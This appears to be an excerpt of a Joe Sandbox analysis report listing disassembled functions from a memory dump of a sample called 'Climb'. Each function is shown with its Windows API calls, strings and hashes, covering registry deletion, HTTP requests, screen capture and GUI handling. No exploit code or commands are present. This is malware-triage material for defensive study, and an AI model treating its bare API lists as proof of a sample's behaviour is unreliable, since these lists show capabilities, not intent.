Opcode ID: 600be92d65ec87d907d2139ab075e49014eb9fc4c9499ddcb8b2d28bc0caa0aa
Instruction ID: ddb10231be07d881527a6db40a4c0a0e3d9881d675d7e6ece5143157ebe51d0f
Opcode Fuzzy Hash: 600be92d65ec87d907d2139ab075e49014eb9fc4c9499ddcb8b2d28bc0caa0aa
Instruction Fuzzy Hash: 55F1BF35608300DFCB14EF24C891BAABBE5BF85314F14895DF9998B2A2DB31ED45CB52

Function 00134A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,0014DCD0), ref: 00134B18
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00134B2A
GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,0014DCD0), ref: 00134B4F
FreeLibrary.KERNEL32(00000000,?,0014DCD0), ref: 00134B9B
StringFromGUID2.OLE32(?,?,00000028,?,0014DCD0), ref: 00134C05
SysFreeString.OLEAUT32(00000009), ref: 00134CBF
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00134D25
SysFreeString.OLEAUT32(?), ref: 00134D4F

Strings

kernel32.dll, xrefs: 00134B13
GetModuleHandleExW, xrefs: 00134B24

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 354098117-199464113
Opcode ID: ccef06ed1b4308eea03cf8277fc761e4f4ccb3ebda598e911c3aa8a15d2e88cb
Instruction ID: b7c5dcac0d126dd86a529b7a5fbfc5485726e20b7aced4ae6360f2be46064d2b
Opcode Fuzzy Hash: ccef06ed1b4308eea03cf8277fc761e4f4ccb3ebda598e911c3aa8a15d2e88cb
Instruction Fuzzy Hash: C3122A75A00115EFDB14CF98C884EAEBBB9FF45314F258098E909AB261D731FD46CBA0

Function 000B381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(001829C0), ref: 000F3F72
GetMenuItemCount.USER32(001829C0), ref: 000F4022
GetCursorPos.USER32(?), ref: 000F4066
SetForegroundWindow.USER32(00000000), ref: 000F406F
TrackPopupMenuEx.USER32(001829C0,00000000,?,00000000,00000000,00000000), ref: 000F4082
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 000F408E

Strings

0, xrefs: 000B382D

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: bbc9ccdaab7d0a86b692ff5e49b345d67f1a263e77a4ad0be1927922bcc5b228
Instruction ID: eeba1aeb83b71c2591953088c6037ace6cc294c5496989b0cb7c689ecf2a7fa4
Opcode Fuzzy Hash: bbc9ccdaab7d0a86b692ff5e49b345d67f1a263e77a4ad0be1927922bcc5b228
Instruction Fuzzy Hash: 2171F630644309FEEB219F28DC49FEABFA5FF05364F200216F6246A5E1CBB19954E751

Function 00147711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00147823

Part of subcall function 000B8577: _wcslen.LIBCMT ref: 000B858A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00147897
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 001478B9
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 001478CC
DestroyWindow.USER32(?), ref: 001478ED
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,000B0000,00000000), ref: 0014791C
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00147935
GetDesktopWindow.USER32 ref: 0014794E
GetWindowRect.USER32(00000000), ref: 00147955
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0014796D
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00147985

Part of subcall function 000B2234: GetWindowLongW.USER32(?,000000EB), ref: 000B2242

Strings

tooltips_class32, xrefs: 00147890, 00147915
0, xrefs: 001477D0

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: d633480de9cfb89d77db3fa13e1b297f9b29624a6ce689966d12f684ca78065d
Instruction ID: a8d5d768b8ef26c1368b9799ff16fe543a4a786eb1d4d54fc2e112e88031ce86
Opcode Fuzzy Hash: d633480de9cfb89d77db3fa13e1b297f9b29624a6ce689966d12f684ca78065d
Instruction Fuzzy Hash: 55717974504245AFDB25CF18DC48FAABBE9FB8A318F05446DF985872B1CB70A94ACB11

Function 00149B7A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 000B249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000B24B0

DragQueryPoint.SHELL32(?,?), ref: 00149BA3

Part of subcall function 001480AE: ClientToScreen.USER32(?,?), ref: 001480D4
Part of subcall function 001480AE: GetWindowRect.USER32(?,?), ref: 0014814A
Part of subcall function 001480AE: PtInRect.USER32(?,?,?), ref: 0014815A

SendMessageW.USER32(?,000000B0,?,?), ref: 00149C0C
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00149C17
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00149C3A
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00149C81
SendMessageW.USER32(?,000000B0,?,?), ref: 00149C9A
SendMessageW.USER32(?,000000B1,?,?), ref: 00149CB1
SendMessageW.USER32(?,000000B1,?,?), ref: 00149CD3
DragFinish.SHELL32(?), ref: 00149CDA
DefDlgProcW.USER32(?,00000233,?,00000000), ref: 00149DCD

Strings

@GUI_DROPID, xrefs: 00149CFA
@GUI_DRAGID, xrefs: 00149D45
@GUI_DRAGFILE, xrefs: 00149D7C

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: 4397d3d4170c8968d9dab398ce30b90cd829fdb4878f25daa76573b6a4b029d3
Instruction ID: ec097d757353d7fb7b69651310f22f9a40f94cede64b71610818608712aaf41c
Opcode Fuzzy Hash: 4397d3d4170c8968d9dab398ce30b90cd829fdb4878f25daa76573b6a4b029d3
Instruction Fuzzy Hash: 03613671508305AFC701EF60DC85DAFBBE8FF99750F400A2EF595922A1DB70AA49CB52

Function 0012CEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0012CEF5
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0012CF08
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0012CF1C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0012CF35
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0012CF78
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0012CF8E
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0012CF99
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0012CFC9
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0012D021
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0012D035
InternetCloseHandle.WININET(00000000), ref: 0012D040

Strings

, xrefs: 0012CFBA

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: a6f04a1d9c5619530162b5c7d680803c9fa691f4965477becf890ca9d26a87c2
Instruction ID: 1f5bd5a800bd00e3b6818aaacaeaf2c0f72bdb38112e55af4ac2a97ec34fa2f1
Opcode Fuzzy Hash: a6f04a1d9c5619530162b5c7d680803c9fa691f4965477becf890ca9d26a87c2
Instruction Fuzzy Hash: 7651ADB5500618BFEB219FA0ED88AAB7BFCFF09744F00441AF94586660D734D955EBA0

Function 00148FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,001466D6,?,?), ref: 00148FEE
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,001466D6,?,?,00000000,?), ref: 00148FFE
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,001466D6,?,?,00000000,?), ref: 00149009
CloseHandle.KERNEL32(00000000,?,?,?,?,001466D6,?,?,00000000,?), ref: 00149016
GlobalLock.KERNEL32(00000000), ref: 00149024
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,001466D6,?,?,00000000,?), ref: 00149033
GlobalUnlock.KERNEL32(00000000), ref: 0014903C
CloseHandle.KERNEL32(00000000,?,?,?,?,001466D6,?,?,00000000,?), ref: 00149043
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,001466D6,?,?,00000000,?), ref: 00149054
OleLoadPicture.OLEAUT32(?,00000000,00000000,00150C04,?), ref: 0014906D
GlobalFree.KERNEL32(00000000), ref: 0014907D
GetObjectW.GDI32(00000000,00000018,?), ref: 0014909D
CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 001490CD
DeleteObject.GDI32(00000000), ref: 001490F5
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0014910B

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 2708cce3a57e950a622702b2798522aae9bcdfa3b47ea936e62b39c8222ba1e3
Instruction ID: c2c50b6d9e6b3e1de2e165deb09947089bcea871bc3bd6dd98f9e51790db526e
Opcode Fuzzy Hash: 2708cce3a57e950a622702b2798522aae9bcdfa3b47ea936e62b39c8222ba1e3
Instruction Fuzzy Hash: 74411879600208BFDB219F65EC89EAB7BBCFF8AB21F104058F905D7660D7719981DB20

Function 0013C06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 000BB329: _wcslen.LIBCMT ref: 000BB333

Part of subcall function 0013D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0013C10E,?,?), ref: 0013D415
Part of subcall function 0013D3F8: _wcslen.LIBCMT ref: 0013D451
Part of subcall function 0013D3F8: _wcslen.LIBCMT ref: 0013D4C8
Part of subcall function 0013D3F8: _wcslen.LIBCMT ref: 0013D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0013C154
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0013C1D2
RegDeleteValueW.ADVAPI32(?,?), ref: 0013C26A
RegCloseKey.ADVAPI32(?), ref: 0013C2DE
RegCloseKey.ADVAPI32(?), ref: 0013C2FC
LoadLibraryA.KERNEL32(advapi32.dll), ref: 0013C352
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 0013C364
RegDeleteKeyW.ADVAPI32(?,?), ref: 0013C382
FreeLibrary.KERNEL32(00000000), ref: 0013C3E3
RegCloseKey.ADVAPI32(00000000), ref: 0013C3F4

Strings

RegDeleteKeyExW, xrefs: 0013C35E
advapi32.dll, xrefs: 0013C34D

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: ac23d675358825987fbbb7cf24d940b47e0b9998cadfca8e6fb22f4eda7c7044
Instruction ID: 7d6d3d68a2ba6c2750850e345394da84d7a08919aff19209a8f12343b6868b94
Opcode Fuzzy Hash: ac23d675358825987fbbb7cf24d940b47e0b9998cadfca8e6fb22f4eda7c7044
Instruction Fuzzy Hash: 45C18A35204201AFD714DF24C494FAABBE1BF84308F14849CF4AA9B6A2CB75ED46CBD1

Function 00132FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00133035
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 00133045
CreateCompatibleDC.GDI32(?), ref: 00133051
SelectObject.GDI32(00000000,?), ref: 0013305E
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 001330CA
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 00133109
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 0013312D
SelectObject.GDI32(?,?), ref: 00133135
DeleteObject.GDI32(?), ref: 0013313E
DeleteDC.GDI32(?), ref: 00133145
ReleaseDC.USER32(00000000,?), ref: 00133150

Strings

(, xrefs: 001330EA

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 31cf4375d926922a5247f75c679f0cf184b33747c97eeba421b30e3ecfc49fb0
Instruction ID: 00679b561f61bfe26bbfb1660bb8b4da99a9d2338fd0509fea069ab8cffa39b5
Opcode Fuzzy Hash: 31cf4375d926922a5247f75c679f0cf184b33747c97eeba421b30e3ecfc49fb0
Instruction Fuzzy Hash: B861E2B5D00219EFCF14CFA4D884EAEBBB5FF48710F208529E959A7250D771AA41CFA4

Function 0014A94F Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 271windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000B249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000B24B0

GetSystemMetrics.USER32(0000000F), ref: 0014A990
GetSystemMetrics.USER32(00000011), ref: 0014A9A7
GetSystemMetrics.USER32(00000004), ref: 0014A9B3
GetSystemMetrics.USER32(0000000F), ref: 0014A9C9
MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 0014AC15
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0014AC33
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0014AC54
ShowWindow.USER32(00000003,00000000), ref: 0014AC73
InvalidateRect.USER32(?,00000000,00000001), ref: 0014AC95
DefDlgProcW.USER32(?,00000005,?), ref: 0014ACBB

Strings

@, xrefs: 0014ABD0

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
String ID: @
API String ID: 3962739598-2766056989
Opcode ID: 3331309c6dae1c37a1836873a21574c1fa719862681e54252bce641f2a58e961
Instruction ID: f71f17aaa360cd7860ccf7f9c1e02f2feed95412a90521c8c2aa3238372a020d
Opcode Fuzzy Hash: 3331309c6dae1c37a1836873a21574c1fa719862681e54252bce641f2a58e961
Instruction Fuzzy Hash: 4CB18774640219EFDF14CF68C9C47AE7BB2FF44705F5A8069EC48AB2A5D770AA80CB51

Function 001152AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 001152E6
GetWindowTextW.USER32(?,?,00000400), ref: 00115328
_wcslen.LIBCMT ref: 00115339
CharUpperBuffW.USER32(?,00000000), ref: 00115345
_wcsstr.LIBVCRUNTIME ref: 0011537A
GetClassNameW.USER32(00000018,?,00000400), ref: 001153B2
GetWindowTextW.USER32(?,?,00000400), ref: 001153EB
GetClassNameW.USER32(00000018,?,00000400), ref: 00115445
GetClassNameW.USER32(?,?,00000400), ref: 00115477
GetWindowRect.USER32(?,?), ref: 001154EF

Strings

ThumbnailClass, xrefs: 001153BD, 00115450

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 4db185af13ee8721e8f9ec789e4ff78a500619f6e900ef860cf610311368eea7
Instruction ID: bc08b02c9d2cbc0694755546c4c9bbf23ff68e8c70f29906c20a49ef773d638f
Opcode Fuzzy Hash: 4db185af13ee8721e8f9ec789e4ff78a500619f6e900ef860cf610311368eea7
Instruction Fuzzy Hash: 5991C471104B06EFDB0CCF24D895AE9B7AAFF81304F004529FA9682591EB31ED95CB91

Function 0014976A Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000B249F: GetWindowLongW.USER32(00000000,000000EB), ref: 000B24B0

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 001497B6
GetFocus.USER32 ref: 001497C6
GetDlgCtrlID.USER32(00000000), ref: 001497D1
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00149879
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0014992B
GetMenuItemCount.USER32(?), ref: 00149948
GetMenuItemID.USER32(?,00000000), ref: 00149958
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0014998A
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 001499CC
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 001499FD

Strings

0, xrefs: 001498FB

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: d0f06ddf8a0e4c2bf93f79dd528c2f88f2b0853cbad2a09d18bf3a0b397e1c9d
Instruction ID: 8c0bf60adf10c44722850002bfaddb089de51729d39d19c30293e8d09163bde7
Opcode Fuzzy Hash: d0f06ddf8a0e4c2bf93f79dd528c2f88f2b0853cbad2a09d18bf3a0b397e1c9d
Instruction Fuzzy Hash: E881E271504306AFDB10CF28DC84AAB7BE8FF89358F10491DF985972A1DB30D945CBA2

Function 0011C8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(001829C0,000000FF,00000000,00000030), ref: 0011C973
SetMenuItemInfoW.USER32(001829C0,00000004,00000000,00000030), ref: 0011C9A8
Sleep.KERNEL32(000001F4), ref: 0011C9BA
GetMenuItemCount.USER32(?), ref: 0011CA00
GetMenuItemID.USER32(?,00000000), ref: 0011CA1D
GetMenuItemID.USER32(?,-00000001), ref: 0011CA49
GetMenuItemID.USER32(?,?), ref: 0011CA90
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0011CAD6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0011CAEB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0011CB0C

Strings

0, xrefs: 0011C904

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: 0
API String ID: 1460738036-4108050209
Opcode ID: 894b89490ba5b012ead36279337e2d96e3fc35249b73a9231505c714e22a1e6c
Instruction ID: 308a3d36269b831b32d219325bc0b000e66cf955129ad820e272d3d31387657d
Opcode Fuzzy Hash: 894b89490ba5b012ead36279337e2d96e3fc35249b73a9231505c714e22a1e6c
Instruction Fuzzy Hash: 5A619170A40249AFDF1ACF64E889AFE7BB9FF05348F044065E911E7251DB35AD81CBA1

Function 0011E4C2 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 178COMMON

Download Yara Rule

APIs

GetFileVersionInfoSizeW.VERSION(?,?), ref: 0011E4D4
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0011E4FA
_wcslen.LIBCMT ref: 0011E504
_wcsstr.LIBVCRUNTIME ref: 0011E554
VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 0011E570

Strings

\VarFileInfo\Translation, xrefs: 0011E568
StringFileInfo\, xrefs: 0011E543
04090000, xrefs: 0011E5A6
DefaultLangCodepage, xrefs: 0011E5D3
%u.%u.%u.%u, xrefs: 0011E64E

Memory Dump Source

Source File: 00000015.00000002.2506411161.00000000000B1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000B0000, based on PE: true

Associated: 00000015.00000002.2506297070.00000000000B0000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.000000000014D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506585434.0000000000173000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506749154.000000000017D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000015.00000002.2506829293.0000000000185000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_b0000_Climb.jbxd

Similarity

API ID: FileInfoVersion$QuerySizeValue_wcslen_wcsstr
